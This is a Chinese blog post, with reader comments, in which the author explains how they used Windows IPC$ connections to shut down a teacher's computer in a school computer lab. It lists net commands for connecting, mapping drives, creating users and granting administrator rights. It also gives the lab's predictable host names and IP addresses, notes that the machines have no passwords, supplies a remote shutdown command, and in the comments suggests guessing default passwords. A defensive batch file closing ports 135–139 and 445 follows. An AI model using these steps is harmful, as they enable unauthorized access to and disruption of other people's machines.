当前位置:首页 > 未分类 > 正文内容

我是如何通过IPC连接关掉老师电脑的

admin4个月前 (03-26)未分类166

挺久没更新了,今天来更新一篇IPC连接操作,为了这篇文章我差点没嗝屁

首先,IPC连接命令直接贴给你们了


net use ipipc$ user 建立IPC空链接

 

net use ipipc$ 密码 user用户名 建立IPC非空链接

 

net use h ipc$ 密码 user用户名 直接登陆后映射对方C:到本地为H

 

net use h ipc$ 登陆后映射对方C:到本地为H

 

net use ipipc$ del 删除IPC链接

 

net use h del 删除映射对方到本地的为H的映射

 

net user 用户名 密码 add 建立用户

 

net user guest activeyes 激活guest用户

 

net user 查看有哪些用户

 

net user 帐户名 查看帐户的属性

 

net localgroup administrators 用户名 add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

 

net start 查看开启了哪些服务

 

net start 服务名  开启服务;(如net start telnet, net start schedule)

 

net stop 服务名 停止某服务

 

net time 目标ip 查看对方时间

 

net time 目标ip set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数yes可取消确认信息

 

net view 查看本地局域网内开启了哪些共享

 

net view ip 查看对方局域网内开启了哪些共享

 

net config 显示系统网络设置

 

net logoff 断开连接的共享

 

net pause 服务名 暂停某服务

 

net send ip 文本信息 向对方发信息

 

net ver 局域网内正在使用的网络连接类型和信息

 

net share 查看本地开启的共享

 

net share ipc$ 开启ipc$共享

 

net share ipc$ del 删除ipc$共享

 

net share c$ del 删除C:共享


然后开始我们的行动【滑稽】

我是如何通过IPC连接关掉老师电脑的 系统安全  第1张

因为电脑室电脑有极域电子教室,所以开着ipc,也可以用net share命令来看看


我是如何通过IPC连接关掉老师电脑的 系统安全  第2张


我们可以看到有个IPC的服务,这时候就来

net use \\IP\ipc$ "密码" /user:用户名

(这里面IP代表要连接到的电脑IP,密码 表示要连接到的电脑密码,用户名 表示要连接到的电脑名称

如果不知道电脑名称的话就用net view来看看

我是如何通过IPC连接关掉老师电脑的 系统安全  第3张

我这里就不看了,极域电子教室下都是STU+编号,如STU27

IP的话也有规律,192.168.0.1+编号,如192.168.0.127

密码的话是没有的

那么这就很NICE

连接试试

(此处暂时不贴图)

连接后我们就可以直接远程关机,如命令

shutdown -m \\%ip% -s -t 0

%ip%代表要连接到的电脑IP

然后就妙了,老师一脸懵,同学一阵欢呼



其实IPC连接不仅仅是只有这个功能,可以搞个极域电子教室玩玩,看看里面有什么功能你就会知道IPC有多么的有用我是如何通过IPC连接关掉老师电脑的 系统安全  第4张



防护篇

如何关闭IPC空密码连接呢(电脑没有密码就连接不到你)

粘贴到记事本后缀名改成bat运行

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous" /v "RestrictAnonymous" /d 00000000 /t REG_dword /f

修改注册表策略

还可以关闭139,445端口

同样是bat文件运行

%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
@echo off 
color 1f 
title 关闭135 445 端口
echo. 
echo. 
echo. 
echo 正在关闭135端口 请稍候… 
netsh advfirewall firewall add rule name = "Disable port 135 - TCP" dir = in action = block protocol = TCP localport = 135,137,138,139
echo. 
netsh advfirewall firewall add rule name = "Disable port 135 - UDP" dir = in action = block protocol = UDP localport = 135,137,138,139
echo. 
echo 正在关闭445端口 请稍候… 
netsh advfirewall firewall add rule name = "Disable port 445 - TCP" dir = in action = block protocol = TCP localport = 445
echo. 
netsh advfirewall firewall add rule name = "Disable port 445 - UDP" dir = in action = block protocol = UDP localport = 445
echo.
echo 按任意键退出 
pause>nul

这个时候就可以了

扫描二维码推送至手机访问。

版权声明:本文由勤奋的思远发布,如需转载请注明出处。

如果文章对你有帮助的话就赞助一下吧https://lsybk.xyz/post/75.html

本文链接:https://lsybk.xyz/post/173.html

标签: 系统安全
分享给朋友:

相关文章

腾讯云Serverless搭建Wordpress

腾讯云Serverless搭建Wordpress

serverless搭建WordPres...

神奇的burp之注册

神奇的burp之注册

这篇文章就来教一下burp的注册与使用b...

友情赞助之赞助列表

友情赞助之赞助列表

感谢赞助的朋友,如有异议,请联系邮箱sy...

Google小恐龙游戏js源码以及直接访问地址

Google小恐龙游戏js源码以及直接访问地址

谷歌小恐龙游戏大家玩过吧无聊时这是个打发...

【渗透测试(1)】普通SQL漏洞手注

【渗透测试(1)】普通SQL漏洞手注

本次使用 封神台 靶...

评论列表

forever
3个月前 (04-28)

你在这搞笑呢?账户和密码你咋知道?暴力破解?机房的电脑不用Windows其他的漏洞,还有教师机肯定装了如360,火绒之类的杀毒软件,你就这?

admin 回复:
对了就是,我连上IPC之后,是不能远程重启的,它会报错禁止访问,但是直接关机就不怕,也不知道为什么
3个月前 (04-28)
admin 回复:
首先,电脑默认账户名是administrator,然后,密码的话可以直接尝试admin,123456或者空密码来一个个试验,then,极域电子教室你可以去了解一下,他有文件收发功能,有这个功能就必须开IPC这个策略,有这个策略我们就可以直接使用IPC连接命令,进行相关操作,所以现在明白了吗
这个具体的我是不太懂,如果还不明白的话可以上百度一下,谢谢评论
3个月前 (04-28)
Gaomoum1
Gaomoum1
4个月前 (03-27)

技术文章 nice

admin 回复:
emmmm我给你个自动化工具吧,QQ见
4个月前 (03-27)

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。